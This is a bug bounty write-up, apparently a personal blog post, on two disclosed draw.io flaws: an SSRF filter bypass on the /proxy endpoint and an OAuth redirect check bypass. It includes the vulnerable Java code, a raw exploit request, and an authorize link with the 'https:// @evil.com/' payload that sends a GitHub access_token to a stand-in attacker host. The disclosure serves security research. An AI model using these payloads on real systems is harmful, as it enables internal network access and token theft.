<!DOCTYPE html>
<html>
<style>

		@font-face { font-family: "gohu"; src: url("/gohu.woff") format('woff'); }
		html {
			background: url('/4rt3/g3n3r4t1v3/sketch_220308a/out.gif') no-repeat center/100% fixed;
		}
		body {
			font-family: 'gohu', monospace;
			max-width: 50em;
			margin: 0 auto;
			color: white;
			line-height: calc(1ex / 0.32);
			margin-top: 3em;
		}
		pre {
			font-family: 'gohu', monospace;
			white-space: pre-wrap;
			line-height: 125%;
      background-color: #111;
      padding: 1em;
		}
		@media only screen and (max-width:768px) {
			body {
				max-width:100%;
			}
		}
		a:link {
			color: #0a0 ;
		}
		a:visited {
			color: #004100 ;
		}
		td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		.codehilite .hll { background-color: #0000ff }
		.codehilite { background: #000000; }
		.codehilite .c { color: #00ff00 } /* Comment */
		.codehilite .k { color: #ff0000 } /* Keyword */
		.codehilite .ch { color: #00ff00 } /* Comment.Hashbang */
		.codehilite .cm { color: #00ff00 } /* Comment.Multiline */
		.codehilite .cp { color: #e5e5e5 } /* Comment.Preproc */
		.codehilite .cpf { color: #00ff00 } /* Comment.PreprocFile */
		.codehilite .c1 { color: #00ff00 } /* Comment.Single */
		.codehilite .cs { color: #00ff00 } /* Comment.Special */
		.codehilite .kc { color: #ff0000 } /* Keyword.Constant */
		.codehilite .kd { color: #ff0000 } /* Keyword.Declaration */
		.codehilite .kn { color: #ff0000 } /* Keyword.Namespace */
		.codehilite .kp { color: #ff0000 } /* Keyword.Pseudo */
		.codehilite .kr { color: #ff0000 } /* Keyword.Reserved */
		.codehilite .kt { color: #ee82ee } /* Keyword.Type */
		.codehilite .s { color: #87ceeb } /* Literal.String */
		.codehilite .no { color: #7fffd4 } /* Name.Constant */
		.codehilite .nf { color: #ffff00 } /* Name.Function */
		.codehilite .nv { color: #eedd82 } /* Name.Variable */
		.codehilite .sa { color: #87ceeb } /* Literal.String.Affix */
		.codehilite .sb { color: #87ceeb } /* Literal.String.Backtick */
		.codehilite .sc { color: #87ceeb } /* Literal.String.Char */
		.codehilite .dl { color: #87ceeb } /* Literal.String.Delimiter */
		.codehilite .sd { color: #87ceeb } /* Literal.String.Doc */
		.codehilite .s2 { color: #87ceeb } /* Literal.String.Double */
		.codehilite .se { color: #87ceeb } /* Literal.String.Escape */
		.codehilite .sh { color: #87ceeb } /* Literal.String.Heredoc */
		.codehilite .si { color: #87ceeb } /* Literal.String.Interpol */
		.codehilite .sx { color: #87ceeb } /* Literal.String.Other */
		.codehilite .sr { color: #87ceeb } /* Literal.String.Regex */
		.codehilite .s1 { color: #87ceeb } /* Literal.String.Single */
		.codehilite .ss { color: #87ceeb } /* Literal.String.Symbol */
		.codehilite .fm { color: #ffff00 } /* Name.Function.Magic */
		.codehilite .vc { color: #eedd82 } /* Name.Variable.Class */
		.codehilite .vg { color: #eedd82 } /* Name.Variable.Global */
		.codehilite .vi { color: #eedd82 } /* Name.Variable.Instance */
		.codehilite .vm { color: #eedd82 } /* Name.Variable.Magic */
	
</style>
<head>
  <meta charset="UTF-8">
</head>

<body><h1>draw.io CVEs</h1>
<p>1677256694</p>
<p>A couple of months ago draw.io was listed as a boosted project on huntr.dev , paying up to 2000 USD for critical vulnerabilities, and as I really enjoy drawing diagrams, I thought it was a good idea to do some security code reviewing on it. I found two CVEs ( <a href="https://huntr.dev/bounties/6ac07c49-bb7f-47b5-b361-33e6757b8757/">CVE-2022-1774</a>, <a href="https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11/">CVE-2022-1713</a> ) in one week and this is a write up about the vulnerabilities and how I found them.</p>
<h2>Starting the code review</h2>
<p>First things first, cloned the repository and ran it locally. Altho it's possible to rely on only reading the code, being able to debug/log the application is really a game changer. I couldn't make any debugging work for Java and Visual Code so I just stuck with good old <code>System.out.println</code>, but debugging is always preferable. I also don't use, but probably should, any fancy tooling like <a href="https://github.com/returntocorp/semgrep">Semgrep</a> or a more complex IDE like <a href="https://code.visualstudio.com/">Visual Code</a>, only <a href="https://www.sublimetext.com/">Sublime Text</a> and reading the outputs on the terminal, I'm an old school outdated guy, I know.</p>
<p>The source has two main parts <code>src/main/java</code> for the Back-end code and <code>src/main/webapp</code> for the Front-end. As I was trying to find the more critical vulnerabilities, I only looked at the Back-end part of the application. The server side is really small compared to the front-end but it has some interesting features. Two parts caught my attention, the <code>*AuthServelet.java</code> files that are responsible for the third-party authentication process, and the <code>ProxyServlet.java</code> that looks like it receives a URL and does something with it.</p>
<p>At this point, I didn't touch the running application but had to find where inside of it those classes are being used. We can see the endpoints and their classes on <code>src/main/webapp/WEB-INF/web.xml</code></p>
<pre class="codehilite"><code class="language-xml">&lt;servlet&gt;
    &lt;description/&gt;
    &lt;display-name&gt;ProxyServlet&lt;/display-name&gt;
    &lt;servlet-name&gt;ProxyServlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.mxgraph.online.ProxyServlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;ProxyServlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/proxy&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
[...]
  &lt;servlet&gt;
    &lt;description/&gt;
    &lt;display-name&gt;GitHubAuthServlet&lt;/display-name&gt;
    &lt;servlet-name&gt;GitHubAuthServlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;com.mxgraph.online.GitHubAuthServlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;GitHubAuthServlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/github2&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
</code></pre>

<h2>SSRF on /proxy - CVE-2022-1713</h2>
<p><code>src/main/java/ProxyServlet.java</code></p>
<pre class="codehilite"><code class="language-java">protected void doGet(HttpServletRequest request,
        HttpServletResponse response) throws ServletException, IOException
{
    String urlParam = request.getParameter(&quot;url&quot;);

    if (checkUrlParameter(urlParam))
    {
        // build the UML source from the compressed request parameter
        String ref = request.getHeader(&quot;referer&quot;);
        String ua = request.getHeader(&quot;User-Agent&quot;);
        String auth = request.getHeader(&quot;Authorization&quot;);
        String dom = getCorsDomain(ref, ua);

        try(OutputStream out = response.getOutputStream())
        {
            request.setCharacterEncoding(&quot;UTF-8&quot;);
            response.setCharacterEncoding(&quot;UTF-8&quot;);

            URL url = new URL(urlParam);
            URLConnection connection = url.openConnection();
            connection.setConnectTimeout(TIMEOUT);
            connection.setReadTimeout(TIMEOUT);

            response.setHeader(&quot;Cache-Control&quot;, &quot;private, max-age=86400&quot;);
</code></pre>

<p>It's pretty clear that the endpoint receives an <code>url</code> parameter and does some checking with <code>checkUrlParameter(urlParam)</code> to see if will allow a request to be made. Let's check the function.</p>
<pre class="codehilite"><code class="language-java">public boolean checkUrlParameter(String url)
 {
 if (url != null)
 {
 try
  {
   URL parsedUrl = new URL(url);
  String protocol = parsedUrl.getProtocol();
    String host = parsedUrl.getHost().toLowerCase();
    return (protocol.equals(&quot;http&quot;) || protocol.equals(&quot;https&quot;))
     &amp;&amp; !host.endsWith(&quot;.internal&quot;)
     &amp;&amp; !host.endsWith(&quot;.local&quot;)
     &amp;&amp; !host.contains(&quot;localhost&quot;)
     &amp;&amp; !host.startsWith(&quot;0.&quot;) // 0.0.0.0/8
     &amp;&amp; !host.startsWith(&quot;10.&quot;) // 10.0.0.0/8
     &amp;&amp; !host.startsWith(&quot;127.&quot;) // 127.0.0.0/8
     &amp;&amp; !host.startsWith(&quot;169.254.&quot;) // 169.254.0.0/16
     &amp;&amp; !host.startsWith(&quot;172.16.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.17.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.18.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.19.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.20.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.21.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.22.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.23.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.24.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.25.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.26.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.27.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.28.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.29.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.30.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;172.31.&quot;) // 172.16.0.0/12
     &amp;&amp; !host.startsWith(&quot;192.0.0.&quot;) // 192.0.0.0/24
     &amp;&amp; !host.startsWith(&quot;192.168.&quot;) // 192.168.0.0/16
     &amp;&amp; !host.startsWith(&quot;198.18.&quot;) // 198.18.0.0/15
     &amp;&amp; !host.startsWith(&quot;198.19.&quot;) // 198.18.0.0/15
     &amp;&amp; !host.endsWith(&quot;.arpa&quot;); // reverse domain (needed?)
   }
   catch (MalformedURLException e)
   {
    return false;
   }
  }
  else
  {
   return false;
  }
 }
</code></pre>

<p>The function does a series of checking to assure that the url is not internal, and of course this has a LOT of bypasses. I went with the simple <code>http://0:8080/</code> , see more at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery</p>
<pre class="codehilite"><code class="language-http">GET /proxy?url=http%3a//0:8080/ HTTP/1.1
Host: 127.0.0.1:8080
sec-ch-ua: &quot;(Not(A:Brand&quot;;v=&quot;8&quot;, &quot;Chromium&quot;;v=&quot;101&quot;
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
sec-ch-ua-platform: &quot;macOS&quot;
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/?mode=device&amp;title=Untitled%20Diagram.drawio.xml&amp;create=https%3A%2F%2Fxcd8bz39zlnis2ngq84j05tt7kda1z.oastify.com%2F&amp;sync=manual&amp;db=0&amp;gh=0&amp;tr=0&amp;gapi=0&amp;od=0&amp;gl=0
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
</code></pre>

<p>Not much to add here, just a simple SSRF bypass.</p>
<h2>Leakage of third-party OAuth token - CVE-2022-1774</h2>
<p>As the <code>*AuthServelet.java</code> files grabbed my attention, I began to inspect the Github OAuth authentication process of draw.io dynamically, doing all the proccess and checking the requests.</p>
<ol>
<li>
<p>The application sends the user to https://github.com/login/oauth/authorize?client_id=Iv1.98d62f0431e40543&amp;state=cId%3DIv1.98d62f0431e40543%26domain%3Dapp.diagrams.net%26redirect%3d%2fprofile%26token%3DTOKEN</p>
</li>
<li>
<p>Github asks the user for permission, and sends the user back to https://app.diagrams.net/&amp;redirect=profile&amp;token=TOKEN from the <code>state</code> parameters</p>
</li>
<li>
<p>The application then checks if the <code>redirect</code> parameter is a relative URL, then redirects the user to it with an <code>access_token</code> secret.</p>
</li>
</ol>
<p>So if we redirect the user to our site, the <code>access_token</code> will be forwarded and leaked. With the <code>access_token</code> we can perform actions as the application on the Github API.
So let's check how the URL from <code>redirect</code> is checked.</p>
<p><code>drawio/src/main/java/com/mxgraph/online/AbsAuthServlet.java</code></p>
<pre class="codehilite"><code class="language-java">domain = stateVars.get(&quot;domain&quot;);
client = stateVars.get(&quot;cId&quot;);
stateToken = stateVars.get(&quot;token&quot;);
version = stateVars.get(&quot;ver&quot;);
successRedirect = stateVars.get(&quot;redirect&quot;);

//Redirect to a page on the same domain only (relative path)
if (successRedirect != null &amp;&amp; isAbsolute(successRedirect))
{
    successRedirect = null;
}
[...]

public static boolean isAbsolute(String url)
{
    if (url.startsWith(&quot;//&quot;))  // //www.domain.com/start
    {
        return true;
    }

    if (url.startsWith(&quot;/&quot;)) // /somePage.html
    {
        return false;
    }

    boolean result = false;

    try 
    {
        URI uri = new URI(url);
        result = uri.isAbsolute();
    }
    catch (URISyntaxException e) {} //Ignore

    return result;
}
</code></pre>

<p>The <code>isAbsolute</code> function receives a <code>url</code> and first checks if it starts with <code>//</code> because that will translate to <code>http://whatever</code>, let's check some examples from the <a href="https://www.rfc-editor.org/rfc/rfc3986">RFC 3986</a> for the URI syntax :</p>
<pre class="codehilite"><code>&quot;g:h&quot;           =  &quot;g:h&quot;
&quot;g&quot;             =  &quot;http://a/b/c/g&quot;
&quot;./g&quot;           =  &quot;http://a/b/c/g&quot;
&quot;g/&quot;            =  &quot;http://a/b/c/g/&quot;
&quot;/g&quot;            =  &quot;http://a/g&quot;
&quot;//g&quot;           =  &quot;http://g&quot;
&quot;?y&quot;            =  &quot;http://a/b/c/d;p?y&quot;
&quot;g?y&quot;           =  &quot;http://a/b/c/g?y&quot;
&quot;#s&quot;            =  &quot;http://a/b/c/d;p?q#s&quot;
&quot;g#s&quot;           =  &quot;http://a/b/c/g#s&quot;
&quot;g?y#s&quot;         =  &quot;http://a/b/c/g?y#s&quot;
&quot;;x&quot;            =  &quot;http://a/b/c/;x&quot;
&quot;g;x&quot;           =  &quot;http://a/b/c/g;x&quot;
&quot;g;x?y#s&quot;       =  &quot;http://a/b/c/g;x?y#s&quot;
&quot;&quot;              =  &quot;http://a/b/c/d;p?q&quot;
&quot;.&quot;             =  &quot;http://a/b/c/&quot;
&quot;./&quot;            =  &quot;http://a/b/c/&quot;
&quot;..&quot;            =  &quot;http://a/b/&quot;
&quot;../&quot;           =  &quot;http://a/b/&quot;
&quot;../g&quot;          =  &quot;http://a/b/g&quot;
&quot;../..&quot;         =  &quot;http://a/&quot;
&quot;../../&quot;        =  &quot;http://a/&quot;
&quot;../../g&quot;       =  &quot;http://a/g&quot;
</code></pre>

<p>If it starts with only a <code>/</code> is not an absolute URL, and then it passes the <code>url</code> to the <code>URI</code> class. The catch here is that if <code>URISyntaxException</code> is raised the function will return <code>false</code>, telling that the URL is not absolute and then redirecting the user. At first glance this looks okay, because if an URL is not valid why would the redirect work, right ? Wrong! This only works if the client actually doing the redirect, the browser in this case, complies with the RFC and Chrome does NOT, wtf. Now we need to find an absolute URL that is not valid but that Chrome accepts on the <code>Location</code> header.</p>
<p>I did some fuzzing and some manual testing and ended up with <code>https:// @evil.com/</code>, note the space. This is not a valid URL by the RFC: </p>
<pre class="codehilite"><code>unreserved  = ALPHA / DIGIT / &quot;-&quot; / &quot;.&quot; / &quot;_&quot; / &quot;~&quot;
pct-encoded = &quot;%&quot; HEXDIG HEXDIG
sub-delims  = &quot;!&quot; / &quot;$&quot; / &quot;&amp;&quot; / &quot;'&quot; / &quot;(&quot; / &quot;)&quot;
                  / &quot;*&quot; / &quot;+&quot; / &quot;,&quot; / &quot;;&quot; / &quot;=&quot;
userinfo    = *( unreserved / pct-encoded / sub-delims / &quot;:&quot; )
authority   = [ userinfo &quot;@&quot; ] host [ &quot;:&quot; port ]
</code></pre>

<p>No whitespace in the <code>userinfo</code>. This will end up on the <code>catch</code> statement, bypassing the check and redirecting the user to <code>evil.com</code>, leaking the <code>access_token</code>.</p>
<pre class="codehilite"><code class="language-http">HTTP/2 302 Found
Date: Sat, 14 May 2022 04:08:37 GMT
Content-Type: text/html
Location: https:// @evil.com/#%7B%22access_token%22%3A%22ghu_eEEIwuwg1GN1FwidVj4TS4pAa8plEc02asJs%22%2C%22expires_in%22%3A28800%7D
Set-Cookie: auth-state= ;path=/github2; expires=Thu, 01 Jan 1970 00:00:00 UTC; Secure; HttpOnly; SameSite=none
Set-Cookie: auth-tokenIv1.98d62f0431e40543=ghr_MRUNjYWPUiKUDKFlQTxcT6442q0L6l6LdWcKf9XBqeYZV3bYYhMyaX6fYJV8kuKk1WRO6Y4gQHzK; Max-Age=31536000;path=/github2; Secure; HttpOnly; SameSite=none
X-Cloud-Trace-Context: 766df5ad8123a0fa5701fc92aec830d4
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri=&quot;https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct&quot;
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
Server: cloudflare
Cf-Ray: 70b0c6119831273d-FOR
</code></pre>

<p>The steps of the attack are:</p>
<ol>
<li>
<p>An attacker creates an third-party authorize link, with the payload <code>%20%40evil.com</code> on the <code>redirect</code> parameter :
<code>https://github.com/login/oauth/authorize?client_id=Iv1.98d62f0431e40543&amp;state=cId%3DIv1.98d62f0431e40543%26domain%3Dapp.diagrams.net%26redirect%3dhttps%3a%2f%2f%20%40evil.com%2f%26token%3Dplrpdrqccuavr39ta3h5bcmjoghhk2le7tdiflbm3ljpe4tdqj</code></p>
</li>
<li>
<p>The user accepts to connect draw.io with Github</p>
</li>
<li>
<p>The user is redirected back to app.diagrams.net</p>
</li>
<li>
<p>The user is redirected to evil.com, leaking the <code>access_token</code></p>
</li>
</ol>
<p>the power of an space
ψ( ` ∇ ´ )ψ</p></body><hr>by <a href='https://twitter.com/caioluders'>@caioluders</a></html>